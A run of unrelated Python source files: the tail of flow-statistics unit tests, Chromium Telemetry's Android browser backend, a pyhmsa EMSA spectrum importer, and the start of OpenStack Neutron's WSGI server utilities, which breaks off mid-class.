(count(step_c.sent_count), count(step_c.received_count), count(step_c.read_count)))
self.assertEqual(2, len(step_c.buttons))
self.assertEqual(1, count(step_c.get_button('three').acked_count))
self.assertEqual(1, count(step_c.get_button(None).acked_count))
# step D
step_d = statsTO.get_step('D')
self.assertTupleEqual((1, 1, 1),
(count(step_d.sent_count), count(step_d.received_count), count(step_d.read_count)))
self.assertEqual(1, len(step_d.buttons))
self.assertEqual(1, count(step_d.get_button(None).acked_count))
# step E
step_e = statsTO.get_step('E')
self.assertTupleEqual((3, 3, 2),
(count(step_e.sent_count), count(step_e.received_count), count(step_e.read_count)))
self.assertEqual(1, len(step_e.buttons))
self.assertEqual(2, count(step_e.get_button(None).acked_count))
def test_flow_stats_tomorrow(self):
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
_now = now()
stats.set_today(datetime.datetime.utcfromtimestamp(_now - 86400).date())
breadcrumbs = list()
current_step_id = 'step_1'
status = FlowStatistics.STATUS_SENT
btn_id = None
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1], stats.step_0_sent)
stats.set_today(datetime.datetime.utcfromtimestamp(_now).date())
self.assertListEqual([1, 0], stats.step_0_sent)
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1, 1], stats.step_0_sent)
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1, 2], stats.step_0_sent)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_STEPS,
days=2)
stepTO = statsTO.get_step(current_step_id)
self.assertEqual(1, stepTO.sent_count[0].count) # yesterday
self.assertEqual(2, stepTO.sent_count[1].count) # today
self.assertLess(datetime.date(year=stepTO.sent_count[0].year, month=stepTO.sent_count[0].month,
day=stepTO.sent_count[0].day),
datetime.date(year=stepTO.sent_count[1].year, month=stepTO.sent_count[1].month,
day=stepTO.sent_count[1].day))
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import subprocess
from telemetry.core import exceptions
from telemetry.internal.platform import android_platform_backend as \
android_platform_backend_module
from telemetry.core import util
from telemetry.internal.backends import android_command_line_backend
from telemetry.internal.backends import browser_backend
from telemetry.internal.backends.chrome import chrome_browser_backend
from telemetry.internal import forwarders
from pylib.device import intent
class AndroidBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
"""The backend for controlling a browser instance running on Android."""
def __init__(self, android_platform_backend, browser_options,
backend_settings, output_profile_path, extensions_to_load,
target_arch):
assert isinstance(android_platform_backend,
android_platform_backend_module.AndroidPlatformBackend)
super(AndroidBrowserBackend, self).__init__(
android_platform_backend,
supports_tab_control=backend_settings.supports_tab_control,
supports_extensions=False, browser_options=browser_options,
output_profile_path=output_profile_path,
extensions_to_load=extensions_to_load)
self._port_keeper = util.PortKeeper()
    # Use the port held by _port_keeper by default.
self._port = self._port_keeper.port
if len(extensions_to_load) > 0:
raise browser_backend.ExtensionsNotSupportedException(
'Android browser does not support extensions.')
# Initialize fields so that an explosion during init doesn't break in Close.
self._backend_settings = backend_settings
self._target_arch = target_arch
self._saved_sslflag = ''
# TODO(wuhu): Move to network controller backend.
self.platform_backend.InstallTestCa()
# Kill old browser.
self._KillBrowser()
if self.device.HasRoot() or self.device.NeedsSU():
if self.browser_options.profile_dir:
self.platform_backend.PushProfile(
self._backend_settings.package,
self.browser_options.profile_dir)
elif not self.browser_options.dont_override_profile:
self.platform_backend.RemoveProfile(
self._backend_settings.package,
self._backend_settings.profile_ignore_list)
if self.browser_options.netsim:
assert self.platform_backend.use_rndis_forwarder, (
'Netsim requires RNDIS forwarding.')
self.wpr_port_pairs = forwarders.PortPairs(
http=forwarders.PortPair(0, 80),
https=forwarders.PortPair(0, 443),
dns=forwarders.PortPair(0, 53))
# Set the debug app if needed.
self.platform_backend.SetDebugApp(self._backend_settings.package)
@property
def log_file_path(self):
return None
@property
def device(self):
return self.platform_backend.device
def _KillBrowser(self):
if self.device.IsUserBuild():
self.platform_backend.StopApplication(self._backend_settings.package)
else:
self.platform_backend.KillApplication(self._backend_settings.package)
def Start(self):
self.device.RunShellCommand('logcat -c')
if self.browser_options.startup_url:
url = self.browser_options.startup_url
elif self.browser_options.profile_dir:
url = None
else:
      # If we have no existing tabs, start with a blank page, since default
      # startup with the NTP can lead to race conditions with Telemetry.
url = 'about:blank'
self.platform_backend.DismissCrashDialogIfNeeded()
browser_startup_args = self.GetBrowserStartupArgs()
with android_command_line_backend.SetUpCommandLineFlags(
self.device, self._backend_settings, browser_startup_args):
self.device.StartActivity(
intent.Intent(package=self._backend_settings.package,
activity=self._backend_settings.activity,
action=None, data=url, category=None),
blocking=True)
remote_devtools_port = self._backend_settings.GetDevtoolsRemotePort(
self.device)
try:
# Release reserved port right before forwarding host to device.
self._port_keeper.Release()
assert self._port == self._port_keeper.port, (
          'Android browser backend must use the port reserved by _port_keeper')
self.platform_backend.ForwardHostToDevice(
self._port, remote_devtools_port)
except Exception:
logging.exception('Failed to forward %s to %s.',
str(self._port), str(remote_devtools_port))
logging.warning('Currently forwarding:')
try:
for line in self.device.adb.ForwardList().splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing forwarded '
'connections.')
logging.warning('Host tcp ports in use:')
try:
for line in subprocess.check_output(['netstat', '-t']).splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing tcp ports.')
logging.warning('Device unix domain sockets in use:')
try:
for line in self.device.ReadFile('/proc/net/unix', as_root=True,
force_pull=True).splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing unix domain sockets.')
raise
try:
self._WaitForBrowserToComeUp()
self._InitDevtoolsClientBackend(remote_devtools_port)
except exceptions.BrowserGoneException:
logging.critical('Failed to connect to browser.')
if not (self.device.HasRoot() or self.device.NeedsSU()):
logging.critical(
'Resolve this by either: '
'(1) Flashing to a userdebug build OR '
'(2) Manually enabling web debugging in Chrome at '
'Settings > Developer tools > Enable USB Web debugging.')
self.Close()
raise
except:
self.Close()
raise
def GetBrowserStartupArgs(self):
args = super(AndroidBrowserBackend, self).GetBrowserStartupArgs()
args.append('--enable-remote-debugging')
args.append('--disable-fre')
args.append('--disable-external-intent-requests')
return args
@property
def pid(self):
pids = self.device.GetPids(self._backend_settings.package)
if not pids or self._backend_settings.package not in pids:
raise exceptions.BrowserGoneException(self.browser)
if len(pids[self._backend_settings.package]) > 1:
raise Exception(
'At most one instance of process %s expected but found pids: '
'%s' % (self._backend_settings.package, pids))
return int(pids[self._backend_settings.package][0])
@property
def browser_directory(self):
return None
@property
def profile_directory(self):
return self._backend_settings.profile_dir
@property
def package(self):
return self._backend_settings.package
@property
def activity(self):
return self._backend_settings.activity
def __del__(self):
self.Close()
def Close(self):
super(AndroidBrowserBackend, self).Close()
self.platform_backend.RemoveTestCa()
self._KillBrowser()
self.platform_backend.StopForwardingHost(self._port)
if self._output_profile_path:
self.platform_backend.PullProfile(
self._backend_settings.package, self._output_profile_path)
def IsBrowserRunning(self):
return self.platform_backend.IsAppRunning(self._backend_settings.package)
def GetStandardOutput(self):
return self.platform_backend.GetStandardOutput()
def GetStackTrace(self):
return self.platform_backend.GetStackTrace(self._target_arch)
@property
def should_ignore_certificate_errors(self):
return not self.platform_backend.is_test_ca_installed
|
|
"""
Importer from EMSA file format
"""
# Standard library modules.
import datetime
# Third party modules.
import numpy as np
# Local modules.
from pyhmsa.fileformat.importer.importer import _Importer, _ImporterThread
from pyhmsa.fileformat.common.emsa import calculate_checksum
from pyhmsa.datafile import DataFile
from pyhmsa.spec.header import Header
from pyhmsa.spec.condition.probe import ProbeEM, ProbeTEM
from pyhmsa.spec.condition.acquisition import AcquisitionPoint
from pyhmsa.spec.condition.specimenposition import SpecimenPosition
from pyhmsa.spec.condition.detector import \
(DetectorSpectrometer, DetectorSpectrometerXEDS, DetectorSpectrometerCL,
Window)
from pyhmsa.spec.condition.calibration import CalibrationLinear
from pyhmsa.spec.datum.analysis import Analysis1D
from pyhmsa.type.unit import validate_unit
from pyhmsa.util.parsedict import parsedict
# Globals and constants variables.
from pyhmsa.spec.condition.detector import \
(COLLECTION_MODE_PARALLEL, COLLECTION_MODE_SERIAL,
XEDS_TECHNOLOGY_GE, XEDS_TECHNOLOGY_SILI, XEDS_TECHNOLOGY_SDD,
XEDS_TECHNOLOGY_UCAL,
SIGNAL_TYPE_EDS, SIGNAL_TYPE_WDS, SIGNAL_TYPE_CLS)
from pyhmsa.fileformat.common.emsa import \
(EMSA_ELS_DETECTOR_SERIAL, EMSA_ELS_DETECTOR_PARALL,
EMSA_EDS_DETECTOR_SIBEW, EMSA_EDS_DETECTOR_SIUTW, EMSA_EDS_DETECTOR_SIWLS,
EMSA_EDS_DETECTOR_GEBEW, EMSA_EDS_DETECTOR_GEUTW, EMSA_EDS_DETECTOR_GEWLS,
EMSA_EDS_DETECTOR_SDBEW, EMSA_EDS_DETECTOR_SDUTW, EMSA_EDS_DETECTOR_SDWLS,
EMSA_EDS_DETECTOR_UCALUTW)
_ELSDET_TO_COLLECTION_MODE = \
{EMSA_ELS_DETECTOR_PARALL: COLLECTION_MODE_PARALLEL,
EMSA_ELS_DETECTOR_SERIAL: COLLECTION_MODE_SERIAL}
_EDSDET_TO_XEDS_TECHNOLOGY = \
{EMSA_EDS_DETECTOR_SIBEW: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_SIUTW: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_SIWLS: XEDS_TECHNOLOGY_SILI,
EMSA_EDS_DETECTOR_GEBEW: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_GEUTW: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_GEWLS: XEDS_TECHNOLOGY_GE,
EMSA_EDS_DETECTOR_SDBEW: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_SDUTW: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_SDWLS: XEDS_TECHNOLOGY_SDD,
EMSA_EDS_DETECTOR_UCALUTW: XEDS_TECHNOLOGY_UCAL}
class _ImporterEMSAThread(_ImporterThread):
def _run(self, filepath, *args, **kwargs):
emsa_file = None
try:
# Parse EMSA file
emsa_file = open(filepath, 'rt')
lines = emsa_file.readlines()
self._update_status(0.1, 'Verify checksum')
self._verify_checksum(lines)
self._update_status(0.2, 'Parse keywords')
keywords = self._parse_keywords(lines)
self._update_status(0.3, 'Parse data')
buffer = self._parse_data(lines, keywords)
# Create data file
datafile = DataFile()
self._update_status(0.4, 'Extracting header')
datafile.header.update(self._extract_header(keywords))
self._update_status(0.5, 'Extracting probe')
datafile.conditions.update(self._extract_probe(keywords))
self._update_status(0.6, 'Extracting acquisition')
datafile.conditions.update(self._extract_acquisition(keywords))
self._update_status(0.7, 'Extracting detector')
datafile.conditions.update(self._extract_detector(keywords))
datum = Analysis1D(len(buffer), dtype=buffer.dtype,
buffer=np.ravel(buffer),
conditions=datafile.conditions)
datafile.data['Spectrum'] = datum
finally:
if emsa_file is not None:
emsa_file.close()
return datafile
def _is_line_keyword(self, line):
try:
return line.strip()[0] == '#'
except:
return False
def _verify_checksum(self, lines):
for line in lines:
if not self._is_line_keyword(line):
continue
tag, _comment, expected_checksum = self._parse_keyword_line(line)
if tag == 'ENDOFDATA':
return # No checksum
if tag == 'CHECKSUM':
break
actual_checksum = calculate_checksum(lines)
        if actual_checksum != int(expected_checksum):
            raise IOError("The checksums don't match: %i != %i " % \
                          (actual_checksum, int(expected_checksum)))
def _parse_keywords(self, lines):
keywords = parsedict()
# First pass
for line in lines:
if not self._is_line_keyword(line):
break
tag, _comment, value = self._parse_keyword_line(line)
if tag == 'SPECTRUM':
break
keywords.setdefault(tag, []).append(value)
# Second pass (remove list if only one value)
for tag, values in keywords.items():
if len(values) == 1:
keywords[tag] = values[0]
else:
keywords[tag] = tuple(values)
return keywords
def _parse_keyword_line(self, line):
line = line.strip("#") # Strip keyword character
tag, value = line.split(":", 1)
tag = tag.strip()
value = value.strip()
try:
tag, comment = tag.split()
except:
comment = ""
tag = tag.upper()
comment = comment.strip("-")
return tag, comment, value
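    # Illustrative example (assumed EMSA keyword syntax, not from this file):
    # a line such as "#BEAMKV   -kV : 20.0" parses into tag='BEAMKV',
    # comment='kV', value='20.0'.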
def _parse_data(self, lines, keywords):
# Filter to get only data lines
lines = filter(lambda line: not self._is_line_keyword(line), lines)
# Read based on data type
datatype = keywords.get('DATATYPE')
if datatype is None:
raise ValueError('No DATATYPE specified')
datatype = datatype.upper()
if datatype == 'XY':
data = self._parse_data_xy(lines, keywords)
elif datatype == 'Y':
data = self._parse_data_y(lines, keywords)
else:
raise ValueError('Unknown data type')
# Check number of points
npoints = int(float(keywords.get('NPOINTS', len(data))))
if npoints != len(data):
raise ValueError('Inconsistent number of points. NPOINTS=%i != len(data)=%i' % \
(npoints, len(data)))
return data
def _parse_data_xy(self, lines, keywords):
data = []
for line in lines:
data.append(self._parse_data_line(line))
return np.array(data)[:, 1]
def _parse_data_y(self, lines, keywords):
ydata = []
for line in lines:
ydata.extend(self._parse_data_line(line))
return np.array(ydata)
def _parse_data_line(self, line):
# Split values separated by a comma
tmprow = [value.strip() for value in line.split(',')]
# Split values separated by a space
row = []
for value in tmprow:
row.extend(value.split())
# Convert to float
row = list(map(float, row))
return row
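    # Illustrative example (not from the original source): the data line
    # "1.0, 2.0 3.0" yields [1.0, 2.0, 3.0]; for DATATYPE 'XY' only the second
    # column (the Y values) is kept by _parse_data_xy above.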
def _extract_header(self, keywords):
header = Header()
header.title = keywords['TITLE']
header.date = \
datetime.datetime.strptime(keywords['DATE'], '%d-%b-%Y').date()
header.time = \
datetime.datetime.strptime(keywords['TIME'], '%H:%M').time()
header.author = keywords['OWNER']
return header
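    # Illustrative example (assumed EMSA date/time forms): "#DATE : 23-OCT-2013"
    # and "#TIME : 14:53" match the '%d-%b-%Y' and '%H:%M' patterns used above.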
def _extract_probe(self, keywords):
if 'BEAMKV' not in keywords:
return {}
kwargs = {}
kwargs['beam_voltage'] = (keywords.getfloat('BEAMKV'), 'kV')
kwargs['beam_current'] = (keywords.getfloat('PROBECUR'), 'nA')
kwargs['emission_current'] = (keywords.getfloat('EMISSION'), 'uA')
kwargs['beam_diameter'] = (keywords.getfloat('BEAMDIAM'), 'nm')
kwargs['scan_magnification'] = keywords.getint('MAGCAM')
if 'OPERMODE' in keywords:
kwargs['lens_mode'] = keywords.get('OPERMODE') # Enums are identical
kwargs['convergence_angle'] = (keywords.getfloat('CONVANGLE'), 'mrad')
c = ProbeTEM(**kwargs)
else:
c = ProbeEM(**kwargs)
return {'Probe0': c}
def _extract_acquisition(self, keywords):
if 'XPOSITION' not in keywords or \
'YPOSITION' not in keywords or \
'ZPOSITION' not in keywords:
return {}
position = SpecimenPosition(x=keywords.getfloat('XPOSITION'),
y=keywords.getfloat('YPOSITION'),
z=keywords.getfloat('ZPOSITION')) #FIXME: Handle XTILTSTGE and YTILTSTGE
dwell_time = (keywords.getfloat('DWELLTIME'), 'ms')
if 'INTEGTIME' in keywords:
total_time = (keywords.getfloat('INTEGTIME'), 'ms')
else:
total_time = (keywords.getfloat('REALTIME'), 's')
dwell_time_live = (keywords.getfloat('LIVETIME'), 's')
c = AcquisitionPoint(position, dwell_time, total_time, dwell_time_live)
return {'Acq0': c}
def _extract_detector(self, keywords):
if 'SIGNALTYPE' not in keywords:
return {}
        signal_type = keywords.get('SIGNALTYPE') # Enum values are identical
kwargs = {}
kwargs['signal_type'] = signal_type
kwargs['channel_count'] = keywords.getint('NPOINTS')
quantity = keywords.get('XLABEL', 'Energy')
unit = keywords.get('XUNITS')
gain = keywords.getfloat('XPERCHAN')
offset = keywords.getfloat('OFFSET')
try:
unit = validate_unit(unit)
except ValueError as ex: # Attempt quick fix for common unit
if 'angstroms' in unit:
unit = 'nm'
gain /= 10.0
offset /= 10.0
elif 'eV' in unit:
unit = 'eV'
else:
raise ex
kwargs['calibration'] = CalibrationLinear(quantity, unit, gain, offset)
kwargs['measurement_unit'] = keywords.get('yunits')
kwargs['elevation'] = (keywords.getfloat('ELEVANGLE'), 'degrees')
kwargs['azimuth'] = (keywords.getfloat('AZIMANGLE'), 'degrees')
kwargs['solid_angle'] = (keywords.getfloat('SOLIDANGLE'), 'sr')
kwargs['semi_angle'] = (keywords.getfloat('COLLANGLE'), 'mrad')
kwargs['collection_mode'] = \
_ELSDET_TO_COLLECTION_MODE.get(keywords.get('ELSDET'))
if signal_type in [SIGNAL_TYPE_EDS, SIGNAL_TYPE_WDS]:
window = Window()
if 'TDEADLYR' in keywords:
window.append_layer('Dead layer', (keywords.getfloat('TDEADLYR') * 1e4, 'um'))
if 'TACTLYR' in keywords:
window.append_layer('Active Layer', (keywords.getfloat('TACTLYR') * 1e4, 'um'))
if 'TBEWIND' in keywords:
window.append_layer('Be window', (keywords.getfloat('TBEWIND') * 1e4, 'um'))
if 'TAUWIND' in keywords:
window.append_layer('Au window', (keywords.getfloat('TAUWIND') * 1e4, 'um'))
if 'TALWIND' in keywords:
window.append_layer('Al window', (keywords.getfloat('TALWIND') * 1e4, 'um'))
if 'TPYWIND' in keywords:
window.append_layer('Pyrolene window', (keywords.getfloat('TPYWIND') * 1e4, 'um'))
if 'TBNWIND' in keywords:
window.append_layer('Boron-Nitride window', (keywords.getfloat('TBNWIND') * 1e4, 'um'))
if 'TDIWIND' in keywords:
window.append_layer('Diamond window', (keywords.getfloat('TDIWIND') * 1e4, 'um'))
            if 'THCWIND' in keywords:
                window.append_layer('HydroCarbon window', (keywords.getfloat('THCWIND') * 1e4, 'um'))
if window.layers:
kwargs['window'] = window
if signal_type == SIGNAL_TYPE_EDS:
kwargs['technology'] = \
_EDSDET_TO_XEDS_TECHNOLOGY.get(keywords.get('EDSDET'))
c = DetectorSpectrometerXEDS(**kwargs)
elif signal_type == SIGNAL_TYPE_CLS:
c = DetectorSpectrometerCL(**kwargs)
else:
c = DetectorSpectrometer(**kwargs)
return {signal_type: c}
class ImporterEMSA(_Importer):
SUPPORTED_EXTENSIONS = ('.emsa',)
def _create_thread(self, filepath, *args, **kwargs):
return _ImporterEMSAThread(filepath)
|
|
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility methods for working with WSGI servers
"""
from __future__ import print_function
import errno
import os
import socket
import ssl
import sys
import time
import eventlet.wsgi
eventlet.patcher.monkey_patch(all=False, socket=True, thread=True)
from oslo.config import cfg
from oslo import i18n
from oslo.serialization import jsonutils
from oslo.utils import excutils
import routes.middleware
import webob.dec
import webob.exc
from neutron.common import exceptions as exception
from neutron import context
from neutron.db import api
from neutron.i18n import _LE, _LI
from neutron.openstack.common import log as logging
from neutron.openstack.common import service as common_service
from neutron.openstack.common import systemd
socket_opts = [
cfg.IntOpt('backlog',
default=4096,
help=_("Number of backlog requests to configure "
"the socket with")),
cfg.IntOpt('tcp_keepidle',
default=600,
help=_("Sets the value of TCP_KEEPIDLE in seconds for each "
"server socket. Not supported on OS X.")),
cfg.IntOpt('retry_until_window',
default=30,
help=_("Number of seconds to keep retrying to listen")),
cfg.IntOpt('max_header_line',
default=16384,
help=_("Max header line to accommodate large tokens")),
cfg.BoolOpt('use_ssl',
default=False,
help=_('Enable SSL on the API server')),
cfg.StrOpt('ssl_ca_file',
help=_("CA certificate file to use to verify "
"connecting clients")),
cfg.StrOpt('ssl_cert_file',
help=_("Certificate file to use when starting "
"the server securely")),
cfg.StrOpt('ssl_key_file',
help=_("Private key file to use when starting "
"the server securely")),
]
CONF = cfg.CONF
CONF.register_opts(socket_opts)
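# Illustrative sketch (assumption, not from the original module): since the
# options above are registered without an option group, they are read from the
# [DEFAULT] section of the service configuration file, e.g.
#   [DEFAULT]
#   use_ssl = True
#   ssl_cert_file = /etc/neutron/ssl/server.crt
#   ssl_key_file = /etc/neutron/ssl/server.key
#   retry_until_window = 30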
LOG = logging.getLogger(__name__)
class WorkerService(object):
"""Wraps a worker to be handled by ProcessLauncher"""
def __init__(self, service, application):
self._service = service
self._application = application
self._server = None
def start(self):
# We may have just forked from parent process. A quick disposal of the
        # existing sql connections avoids producing 500 errors later when they
# are discovered to be broken.
api.get_engine().pool.dispose()
self._server = self._service.pool.spawn(self._service._run,
self._application,
self._service._socket)
def wait(self):
if isinstance(self._server, eventlet.greenthread.GreenThread):
self._server.wait()
def stop(self):
if isinstance(self._server, eventlet.greenthread.GreenThread):
self._server.kill()
self._server = None
class Server(object):
"""Server class to manage multiple WSGI sockets and applications."""
def __init__(self, name, threads=1000):
# Raise the default from 8192 to accommodate large tokens
eventlet.wsgi.MAX_HEADER_LINE = CONF.max_header_line
self.pool = eventlet.GreenPool(threads)
self.name = name
self._server = None
def _get_socket(self, host, port, backlog):
bind_addr = (host, port)
# TODO(dims): eventlet's green dns/socket module does not actually
# support IPv6 in getaddrinfo(). We need to get around this in the
# future or monitor upstream for a fix
try:
info = socket.getaddrinfo(bind_addr[0],
bind_addr[1],
socket.AF_UNSPEC,
socket.SOCK_STREAM)[0]
family = info[0]
bind_addr = info[-1]
except Exception:
LOG.exception(_LE("Unable to listen on %(host)s:%(port)s"),
{'host': host, 'port': port})
sys.exit(1)
if CONF.use_ssl:
if not os.path.exists(CONF.ssl_cert_file):
raise RuntimeError(_("Unable to find ssl_cert_file "
": %s") % CONF.ssl_cert_file)
# ssl_key_file is optional because the key may be embedded in the
# certificate file
if CONF.ssl_key_file and not os.path.exists(CONF.ssl_key_file):
raise RuntimeError(_("Unable to find "
"ssl_key_file : %s") % CONF.ssl_key_file)
# ssl_ca_file is optional
if CONF.ssl_ca_file and not os.path.exists(CONF.ssl_ca_file):
raise RuntimeError(_("Unable to find ssl_ca_file "
": %s") % CONF.ssl_ca_file)
def wrap_ssl(sock):
ssl_kwargs = {
'server_side': True,
'certfile': CONF.ssl_cert_file,
'keyfile': CONF.ssl_key_file,
'cert_reqs': ssl.CERT_NONE,
}
if CONF.ssl_ca_file:
ssl_kwargs['ca_certs'] = CONF.ssl_ca_file
ssl_kwargs['cert_reqs'] = ssl.CERT_REQUIRED
return ssl.wrap_socket(sock, **ssl_kwargs)
sock = None
retry_until = time.time() + CONF.retry_until_window
while not sock and time.time() < retry_until:
try:
sock = eventlet.listen(bind_addr,
backlog=backlog,
family=family)
if CONF.use_ssl:
sock = wrap_ssl(sock)
except socket.error as err:
with excutils.save_and_reraise_exception() as ctxt:
if err.errno == errno.EADDRINUSE:
ctxt.reraise = False
eventlet.sleep(0.1)
if not sock:
raise RuntimeError(_("Could not bind to %(host)s:%(port)s "
"after trying for %(time)d seconds") %
{'host': host,
'port': port,
'time': CONF.retry_until_window})
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# sockets can hang around forever without keepalive
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# This option isn't available in the OS X version of eventlet
if hasattr(socket, 'TCP_KEEPIDLE'):
sock.setsockopt(socket.IPPROTO_TCP,
socket.TCP_KEEPIDLE,
CONF.tcp_keepidle)
return sock
def start(self, application, port, host='0.0.0.0', workers=0):
"""Run a WSGI server with the given application."""
self._host = host
self._port = port
backlog = CONF.backlog
self._socket = self._get_socket(self._host,
self._port,
backlog=backlog)
self._launch(application, workers)
def _launch(self, application, workers=0):
service = WorkerService(self, application)
if workers < 1:
# The API service should run in the current process.
self._server = service
service.start()
systemd.notify_once()
else:
# The API service runs in a number of child processes.
# Minimize the cost of checking for child exit by extending the
# wait interval past the default of 0.01s.
self._server = common_service.ProcessLauncher(wait_interval=1.0)
self._server.launch_service(service, workers=workers)
@property
def host(self):
return self._socket.getsockname()[0] if self._socket else self._host
@property
def port(self):
return self._socket.getsockname()[1] if self._socket else self._port
def stop(self):
self._server.stop()
def wait(self):
"""Wait until all servers have completed running."""
try:
self._server.wait()
except KeyboardInterrupt:
pass
def _run(self, application, socket):
"""Start a WSGI server in a new green thread."""
eventlet.wsgi.server(socket, application, custom_pool=self.pool,
log=logging.WritableLogger(LOG))
class Middleware(object):
"""Base WSGI middleware wrapper.
These classes require an application to be initialized that will be called
next. By default the middleware will simply call its wrapped app, or you
can override __call__ to customize its behavior.
"""
@classmethod
def factory(cls, global_config, **local_config):
"""Used for paste app factories in paste.deploy config files.
Any local configuration (that is, values under the [filter:APPNAME]
section of the paste config) will be passed into the `__init__` method
as kwargs.
A hypothetical configuration would look like:
[filter:analytics]
redis_host = 127.0.0.1
paste.filter_factory = nova.api.analytics:Analytics.factory
which would result in a call to the `Analytics` class as
import nova.api.analytics
analytics.Analytics(app_from_paste, redis_host='127.0.0.1')
        You could of course re-implement the `factory` method in subclasses,
        but thanks to the kwarg passing it shouldn't be necessary.
"""
def _factory(app):
return cls(app, **local_config)
return _factory
def __init__(self, application):
self.application = application
def process_request(self, req):
"""Called on each request.
If this returns None, the next application down the stack will be
executed. If it returns a response then that response will be returned
and execution will stop here.
"""
return None
def process_response(self, response):
"""Do whatever you'd like to the response."""
return response
@webob.dec.wsgify
def __call__(self, req):
response = self.process_request(req)
if response:
return response
response = req.get_response(self.application)
return self.process_response(response)
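# Example (illustrative sketch, not part of the original module): a minimal
# middleware built on the base class above.  The class name and header are
# hypothetical.  process_request() short-circuits the chain by returning a
# response, while process_response() only decorates the outgoing response.
#
#     class AuthTokenMiddleware(Middleware):
#         def process_request(self, req):
#             if 'X-Auth-Token' not in req.headers:
#                 return webob.exc.HTTPUnauthorized()
#             return None  # fall through to the wrapped application
#
#         def process_response(self, response):
#             response.headers['X-Validated'] = 'true'
#             return response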
class Request(webob.Request):
def best_match_content_type(self):
"""Determine the most acceptable content-type.
Based on:
1) URI extension (.json)
2) Content-type header
3) Accept* headers
"""
# First lookup http request path
parts = self.path.rsplit('.', 1)
if len(parts) > 1:
_format = parts[1]
if _format in ['json']:
return 'application/{0}'.format(_format)
        # Then check the Content-Type header
type_from_header = self.get_content_type()
if type_from_header:
return type_from_header
ctypes = ['application/json']
        # Finally, search the Accept header
bm = self.accept.best_match(ctypes)
return bm or 'application/json'
def get_content_type(self):
allowed_types = ("application/json")
if "Content-Type" not in self.headers:
LOG.debug("Missing Content-Type")
return None
_type = self.content_type
if _type in allowed_types:
return _type
return None
def best_match_language(self):
"""Determines best available locale from the Accept-Language header.
:returns: the best language match or None if the 'Accept-Language'
header was not available in the request.
"""
if not self.accept_language:
return None
all_languages = i18n.get_available_languages('neutron')
return self.accept_language.best_match(all_languages)
@property
def context(self):
if 'neutron.context' not in self.environ:
self.environ['neutron.context'] = context.get_admin_context()
return self.environ['neutron.context']
class ActionDispatcher(object):
"""Maps method name to local methods through action name."""
def dispatch(self, *args, **kwargs):
"""Find and call local method."""
action = kwargs.pop('action', 'default')
action_method = getattr(self, str(action), self.default)
return action_method(*args, **kwargs)
def default(self, data):
raise NotImplementedError()
class DictSerializer(ActionDispatcher):
"""Default request body serialization."""
def serialize(self, data, action='default'):
return self.dispatch(data, action=action)
def default(self, data):
return ""
class JSONDictSerializer(DictSerializer):
"""Default JSON request body serialization."""
def default(self, data):
def sanitizer(obj):
return unicode(obj)
return jsonutils.dumps(data, default=sanitizer)
class ResponseHeaderSerializer(ActionDispatcher):
"""Default response headers serialization."""
def serialize(self, response, data, action):
self.dispatch(response, data, action=action)
def default(self, response, data):
response.status_int = 200
class ResponseSerializer(object):
"""Encode the necessary pieces into a response object."""
def __init__(self, body_serializers=None, headers_serializer=None):
self.body_serializers = {
'application/json': JSONDictSerializer(),
}
self.body_serializers.update(body_serializers or {})
self.headers_serializer = (headers_serializer or
ResponseHeaderSerializer())
def serialize(self, response_data, content_type, action='default'):
"""Serialize a dict into a string and wrap in a wsgi.Request object.
:param response_data: dict produced by the Controller
:param content_type: expected mimetype of serialized response body
"""
response = webob.Response()
self.serialize_headers(response, response_data, action)
self.serialize_body(response, response_data, content_type, action)
return response
def serialize_headers(self, response, data, action):
self.headers_serializer.serialize(response, data, action)
def serialize_body(self, response, data, content_type, action):
response.headers['Content-Type'] = content_type
if data is not None:
serializer = self.get_body_serializer(content_type)
response.body = serializer.serialize(data, action)
def get_body_serializer(self, content_type):
try:
return self.body_serializers[content_type]
except (KeyError, TypeError):
raise exception.InvalidContentType(content_type=content_type)
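# Example (illustrative sketch): serializing a controller result into a webob
# response with the default JSON body serializer.  The payload dict is made up
# for demonstration purposes only.
#
#     serializer = ResponseSerializer()
#     response = serializer.serialize({'network': {'id': 'net-1'}},
#                                     'application/json')
#     # response.status_int               -> 200 (ResponseHeaderSerializer.default)
#     # response.headers['Content-Type']  -> 'application/json'
#     # response.body                     -> '{"network": {"id": "net-1"}}'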
class TextDeserializer(ActionDispatcher):
"""Default request body deserialization."""
def deserialize(self, datastring, action='default'):
return self.dispatch(datastring, action=action)
def default(self, datastring):
return {}
class JSONDeserializer(TextDeserializer):
def _from_json(self, datastring):
try:
return jsonutils.loads(datastring)
except ValueError:
msg = _("Cannot understand JSON")
raise exception.MalformedRequestBody(reason=msg)
def default(self, datastring):
return {'body': self._from_json(datastring)}
class RequestHeadersDeserializer(ActionDispatcher):
"""Default request headers deserializer."""
def deserialize(self, request, action):
return self.dispatch(request, action=action)
def default(self, request):
return {}
class RequestDeserializer(object):
"""Break up a Request object into more useful pieces."""
def __init__(self, body_deserializers=None, headers_deserializer=None):
self.body_deserializers = {
